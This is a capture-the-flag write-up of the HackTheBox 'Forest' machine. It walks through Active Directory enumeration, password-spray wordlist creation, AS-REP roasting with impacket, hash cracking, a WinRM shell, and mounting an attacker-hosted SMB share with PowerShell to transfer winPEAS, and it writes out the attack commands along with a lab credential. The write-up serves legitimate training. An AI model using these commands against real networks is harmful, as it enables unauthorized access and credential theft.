HackTheBox - Forest

Easy Windows Machine by HTB

Let's start off with a simple nmap scan for open ports and services.

nmap -sC -sV -oA nmap-forest 10.10.10.161

nmap scan results

We will keep a Nmap all port scan running in the background and start enumerating with what we have.

nmap -A -p- -T4 -oA nmap-forest-all-port-scan 10.10.10.161

Enumerating Samba

Incase you don't have smbclient installed on the system.

apt-get install smbclient && apt-get install smbmap

No shares found on Anonymous login.

Enumerating LDAP

apt-get install ldap-utils

Using query to get results for 'objectClass=Person'

We get a ton of data to look after. Query to get all the users present on the machine.

ldapsearch -x -h 10.10.10.161 -b "DC=htb,DC=local" 'objectClass=Person' sAMAccountName | grep sAMAccountName | awk '{print $2}' > ldap-users.txt

Creating Custom Passwords using bash knowledge. We will add various common passwords like Autumn, Spring, Password, etc.

for i in $(cat pwlist.txt);do echo $i; echo ${i}2019; echo ${i}2020; done

Also we will be using hashcat and it's best64 rule to create a unique and promising wordlist.

hashcat.exe --force --stdout -r best64.rule pwlist.txt

Scanning with crackmapexec (Pass-Policy Check)

We can also use rpcclient to enumerate bunch of users and their info.

rpcclient -U '' -N 10.10.10.161

We can use a lot of query options available to enumerate any user. Actually we got a new user named svc-alfresco

As PasswordLockoutThreshold is set to None, we can try bruteforcing the users present.

Getting Shell Access

We will use GetNPUsers.py script by impacket. This script will attempt to list and get TGTs for those users that have the property 'Do not require Kerberos preauthentication' set (UF_DONT_REQUIRE_PREAUTH).

This script is useful for abusing Kerberos against AS-REP Roasting attack.

Make sure to convert the hash into (hashcat) format.

So the password can be cracked using hashcat and rockyou.txt wordlist.

We have read access to NETLOGON and SYSVOL shares.

Here, we can use evil-winrm to get shell on the box as we already have username and password for svc-alfresco service account.

user.txt is presen t in C:\Users\svc-alfresco\Desktop.

Setting Up SMBShare using impacket and using New-PSDrive to mount the share.

First we need to setup a server using smbserver.py from the impacket module.

python3 /opt/impacket/examples/smbserver.py PleaseWork $(pwd) -smb2support -username $USER -password $PASS

We need to transfer winPeas.exe into the target machine for Machine Enumeration. So we will transfer it using SMB Share. First keep the file (winPeas.exe) in the share directory and start off the server.

In order to create a PSDrive (Mount share), we need a create a password credential object.

Creating password/credential object:

$pass = convertto-securestring 'injoker@123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('akshay',$pass)
New-PSDrive -Name akshay -PSProvider FileSystem -Credential $cred -Root \\10.10.14.2\PleaseWork

We can browse the share and can even run the files present in that share as we have successfully authenticated ourself.